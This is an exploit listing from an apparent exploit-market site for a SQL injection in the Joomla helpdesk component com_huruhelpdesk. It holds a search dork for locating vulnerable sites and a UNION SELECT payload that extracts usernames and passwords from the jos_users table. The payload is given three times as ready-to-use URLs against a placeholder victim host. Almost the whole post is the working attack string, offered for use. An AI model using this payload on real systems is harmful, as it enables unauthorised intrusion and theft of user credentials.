[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_huruhelpdesk SQL Injection Vulnerability

Author
Amine_92
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13451
Category
web applications
Date add
23-07-2010
Platform
php
=============================================================
Joomla Component com_huruhelpdesk SQL Injection Vulnerability
=============================================================


Author :   Amine_92
Email  : [amine92_16@hotmail.fr]
Homepage : { www.vbhacker.net/vb }
DORK    :  inurl:"index.php?option=com_huruhelpdesk"
===================================================
 
[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]
 
[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
 
[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
 
====================================================
Thank's to :awras,italiano_capilo & all my friends



#  0day.today [2024-12-26]  #